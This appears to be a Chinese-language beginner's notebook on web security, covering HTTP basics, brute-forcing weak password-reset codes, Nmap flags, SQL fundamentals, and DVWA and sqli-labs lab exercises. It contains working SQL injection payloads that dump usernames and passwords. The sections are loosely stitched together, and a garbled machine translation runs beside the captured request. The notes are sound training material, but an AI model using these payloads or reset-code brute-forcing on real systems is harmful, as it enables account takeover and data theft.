Web基础知识
1 HTTP介绍
HTTP协议(HyperText Transfer Protocol,超文本传输协议)是用于从WWW服务器传输超文本到本地浏览器的传送协议。
它的发展是万维网协会(World Wide Web Consortium)和Internet工作小组IETF(Internet Engineering Task Force)合作的结果。
它可以使浏览器更加高效,使网络传输减少。它不仅保证计算机正确快速地传输超文本文档,还确定传输文档中的哪一部分,以及哪部分内容首先显示(如文本先于图形)等。
1.1 版本
最常用的是HTTP1.0/1.1
最新版本是HTTP2.0,与1.0/1.1相比,有了更高的性能、安全性和灵活性
以前的版本0.9等
2 HTTP协议
2.1 URL与资源
2.1.1 方案的世界
在TCP/IP模型中,所有的网络连接都要使用方案,方案定义使用什么协议,比如http、ftp、telnet
一个标准的网络请求包括:
<scheme>://<user>:<password>@<host>:<port>/<path>;<params>?<query>#<frag>
但在实际使用过程中,对于不同协议可以缺少某些信息,比如
ftp://192.168.169.121
http://www.baidu.com/index.html
对于http协议,主要的包括scheme(协议)、host(主机)和path(资源路径)
2.1.2 URI、URL和URN
URI:统一资源标识符,包括URL和URN
URL:统一资源标识符,比如http://www.baidu.com/index.html就是一个URL
URN:统一资源名,它是无关物理位置的资源名定义,例子urn:ieft:rfc:2141
目前URN处于试验阶段,实际应用还很困难,在没有特别说明时,一般我们说的URI就代表URL
2.1.3 媒体类型
在HTTP中,不管是word文件、js文件或者图片都是资源,通可以通过URL进行请求,但每种不同的文件都要进行区分,以便服务端和客户端进行正确处理,比如播放声音、显示文字。
因此,HTTP仔细地给每种要通过http请求响应传输的对象都打上名为MIME类型的数据格式标签。
MIME: Multipurpose Internet Mail Extension 多用途因特网邮件扩展
最开始是为了解决电子邮件系统之间的问题,后来用于定义更多类型的多谋体内容。常见的MIME:
html:text/html
Ascii: text/plain
Json:text/json
Jpg:image/jpeg
Gif:image/gif
Ppt: application/vnd.ms-powerpoint
Quicktime:video/quicktime
2.2 协议介绍
2.2.1 协议栈
HTTP在TCP/IP协议栈中的位置
HTTP是基于TCP/IP的应用,因此HTTP无须关心网络寻址、数据传输和拓扑结构
2.2.2 协议工作流程
在HTTP1.0/1.1中,HTTP采用请求响应模型来处理HTTP事务 HTTP事务有一条请求命令和一个响应结果组成,它们通过HTTP报文进行数据传输
(1)客户端连接到Web服务器
(2)发送HTTP请求
(3)服务器接受请求并返回HTTP响应
(4)释放连接TCP连接
(5)客户端浏览器解析HTML内容
3 HTTP报文
3.1 报文
HTTP1.0/1.1报文由三部分组成:起始行、首部以及可选、包含数据的主体
其中起始行和首部是由行分隔的ASCII文本
主体是一个可选的数据块,主体中可以包含文本也可以包含二进制数据,也可以为空,与首部通过空一行进行区分
请求报文的格式:
<method>
<headers>
<entity-body>
响应报文的格式:
<version>
<headers>
3.1.1 起始行
所有的HTTP报文都以一个起始行做为开始
请求报文:<method> <request-url> <version> 说明要做什么
响应报文:<version> <status> <reason-phrase> 说明结果怎样
method,包括GET/POST/DELETE等等
version,目前绝大多数都是1.0或者1.1
status,表示做的结果
reason-phrase,是对状态结果的进一步补充说明
3.1.2 首部字段
HTTP首部字段向请求和响应报文中添加了一些附加信息,是一系列 key-value的列表,比如Content-Type:image/jpeg 表示类型是jpeg图片
首部的分类包括
通用首部:在请求和响应中都出现的信息
请求首部:只在请求报文中出现的信息
响应首部:只在响应报文中出现的信息
实体首部:描述主题的长度、内容等的信息
扩展首部:在HTTP规范中没有定义的其他信息
3.1.3 实体
HTTP实体是HTTP报文的负荷,是HTTP要传输的数据内容。
3.2 方法
HTTP基本的方法包括:GET/POST/HEAD/PUT/TRACE/OPTIONS,用来告诉服务端要做什么操作
3.2.1 GET
GET是最常用的方法,通常用于请求服务器发送某个资源
3.2.2 POST
POST是常用的方法之一,用于向服务端提交数据,有主体
逻辑漏洞——简单的任意账户密码重置
这类逻辑漏洞 就没有停的时候 在WAF越来越普及的时代,SQL注入,远程命令执行这类高危可操作漏洞将越来少,而逻辑漏洞则是目前WAF(很久之后的WAF或许也不能防御)的盲区。所以作为一名合格的黑客,学好逻辑漏洞的挖掘思路,是必须的。
浅谈APP漏洞挖掘之逻辑漏洞
.APP漏洞挖掘中逻辑漏洞,包括任意用户密码重置,支付漏洞,任意用户未授权登录。
1任意用户密码重置正文
首先,我们来看看任意用户密码重置。
方法一:密码找回的凭证太弱,为4位或6位纯数字,并且时效过长,导致可爆破从而重置用户密码。
验证码为4位纯数字,我们使用burpsuite爆破。
可以看到成功爆破出了。4位数字0~9有9999种可能,我们线程设置10,五分钟之内就可以爆破出凭证。
方法2:验证码传输在数据包中。
这里共有两种可能,一种在返回包,一种在获取验证码的数据包中。我们来看两个实例。
第一个:验证码在返回包中
在输入好手机号点击下一步时,我们抓包,截取返回包。
注意以上逻辑问题,不可存在越权,或者重要的凭证在不该出现的地方出现。
请求包响应包中每一行的意思
GET /dvwa/DVWA-master/vulnerabilities/brute/?username=§admin§&password=§password§&Login=§Login§ HTTP/1.1
得到╱dvwa╱dvwa–大师╱弱点╱野蛮?用户名=<UNK>admin<UNK>&密码=<UNK>密码<UNK>&登录=<UNK>登录<UNK>htt/1.1
Host: localhost
主机:本地主机
Upgrade-Insecure-Requests: 1
升级不安全的请求:1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
用户代理:mozilla/5.0(窗口nt 10.0;wow64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
接受:文本/html,应用程序/xhtml+XML,应用程序/xml;Q=0.9,图像/webp,图像/apng,*/*;Q=0.8
Referer: http://localhost/dvwa/DVWA-master/vulnerabilities/brute/
引用者:http://localhost/dvwa/DVWA-master/vulnerabilities/brute/
Accept-Encoding: gzip, deflate, br
接受编码:gzip,减缩,BR
Accept-Language: zh-CN,zh;q=0.9
接受语:zh-cn,zh;Q=0.9
Cookie: security=low; PHPSESSID=v7ed0ita6o84t8gsu8in19dv43
Cookie:安全性=低;ppsesid=v7-0ita 6 o 84t 8gsu
Connection: close
连接:关闭
问题1
什么样的字段是爆破字段,爆破是起到什么样的作用
就是假如你不知道无线网密码
你想给他爆破出来 于是你就一个一个的密码去试
不对了就换一个密码
而在你输入了密码之后 会提交一个包出去
那个包里面肯定不止有你的密码,比如会有那个无线网的名称啊
等等
选择爆破的字段就是 你要对什么进行爆破
你要爆破密码 那就把密码选上。那个软件就会从字典里面一行一行读
然后把你选的那个字段替换成他读的那个数据
问题2
1' union select1,database()# 单引号让ID闭合
数据库的语法 select name,pass from test where id = '1';
这是从test数据库中把id为1的人的名字和密码找出来。
在导入那个数据库文件之后 你可以试一下 如果把where id ='1 ;这样是会出错的
就像语文中,说的话 需要上引号和下引号一样
只有半个是不行的。
他的原始语句是select name,pass from test where id = '你的输入'
你想要的效果是 select name,pass from test where id = '1' union select1,database()#
所以你需要输入 1' union select1,database()#
结合起来就是select name,pass from test where id = '1' union select1,database()#'
最后面的'因为注释的原因失去作用。
因为你的输入是拼接在''中间的,前面已经有了一个'了,但是你还想输入其他的语句,所以你要输入一个',与前面的'闭合,保证数据库语法的正确,才可以运行。
问题3
数据型注入
在url中的输入你的payload
eg:http://localhost/sqli-labs-master/Less-2/?id=1--
Nmap基础使用
001.
使用win+r组合键打开运行窗口,输入cmd,按回车打开cmd
输入nmap ip即可使用。
-Pn是不对主机进行存活测试直接扫描
-script是使用脚本,后面跟脚本名字,vuln是基础漏洞检测脚本
-p指定扫描的端口,后面跟端口号
-sS是隐蔽扫描,不会进行完整的握手,不产生日志记录
-sV是开启版本检测,会得到目标主机的版本相关的信息
002
一个数据库里有很多表,每个表里有许多字段,每个字段有各自的内容。
数据库相当于学校名称(一中、二中、三中),表相当于班级(一班、二班、三班),
字段相当于学生的属性(名字、学号、性别、),
字段的内容就是前面学生属性的具体内容(名字是什么,学号是什么,性别是什么)。
003
数据库查询语句一般是查询一个字段的内容是什么,相当于查上面举得例子的学生
select 字段
from 表名
Select 密码
from 班级
例子:Select pass from new
004
如果你不想看所有的内容,只想看一个,可以用where
select 字段名 from 表名
where 条件。
Select 密码
from 班级 where 学生学号=1
例子:select pass from new where id=1
005
如果你只想看学号为2和3的人的密码,可以用limit
例如
Select pass from new limit 1,2 (因为是从0开始排序
所以学号为1的人排序是0,学号为2 的人排序是1)
006
当你想知道两个字段的内容时,
意思就是你想知道一个学生的姓名和密码
可以把想知道的字段名用逗号相连:
select name,pass from new where id=1
当然也可以用
select name,pass from new limit 1
007
Union 联合查询
联合查询的意思是,你刚刚已经进行过一次查询了,
现在你想在查另外一个,他会把你第二次查询的内容放在第一次查询结果的后面。
比如说你第一次查了一个学生的名字,你现在用联合查询又查了他的密码,
他会把你查到的密码放在你第一次查到的名字的下面。
008
讲道理,“nina”是第一个学生的密码,但是它会把他放在第一个你查到的东西的后面。
Union 特点:前后查询的字段数必须一样
比如说我刚刚写了,可以查一个人的名字和密码
select name,pass from new
如果你想用union查询,那你查的字段必须也是两个。
比如这个第一次查的是名字和密码 两个字段 后面只查了一个id字段就会报错
select name,pass from new union select id from new
009
当前面查的是名字和密码 两个字段 后面查了id和pass两个字段时就可以正常运行,
并且把查到的id放在name下面,把pass放在pass下面
数据表之间的关系
数据表关系
关联映射:一对多/多对一
存在最普遍的映射关系,简单来讲就如球员与球队的关系;
一对多:从球队角度来说一个球队拥有多个球员 即为一对多
多对一:从球员角度来说多个球员属于一个球队 即为多对一
关联映射:一对一
一对一关系就如球队与球队所在地址之间的关系,一支球队仅有一个地址,而一个地址区也仅有一支球队。
数据表间一对一关系的表现有两种,一种是外键关联,一种是主键关联。
关联映射:多对多
多对多关系也很常见,例如学生与选修课之间的关系,一个学生可以选择多门选修课,而每个选修课又可以被多名学生选择。
数据库中的多对多关联关系一般需采用中间表的方式处理,将多对多转化为两个一对多
dvwa sql注入
级别:Low
① 输入1 提交
④输入1 and 1=2提交
输入
1' union select 1,table_name from information_schema.tables where table_name='dvwa'#
输入1' union select 1,column_name from information_schema.columns where table_name='users'#
输入
1' union select 1,concat(user,password) from users#
级别 Medium
级别 High
sql-labs
简介
结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言。对于初学者,
数据库仅仅是在客户端和服务端进行数据存储。SQL 通过结构化查询,关系,面向对象编程等
等来管理数据库。编程极客们总是搞出许多这样类型的软件,像MySQL,MS SQL ,Oracle以
及Postgresql。现在有一些程序能让我们有能力通过结构化查询来管理 大型数据库。脚本小子
们一定已经动手体验了类似SQL注入等这样的操作,虽然他们可能已经通过使用自动化工具例
如SQL Map或者SQLNinja来实施攻击,但却还不知它真正的原理。在这篇简短的教程里,我
将会尽力让你对SQL注入是怎样工作的,攻击是怎样发生的以及什么是应用程序SQL漏洞有
-个深入的理解。
